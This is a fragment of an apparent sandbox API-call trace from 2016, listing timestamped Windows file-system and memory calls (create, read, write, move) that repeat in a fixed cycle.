"api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,275", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,285", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,305", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,385", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,415", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,495", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,505", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": 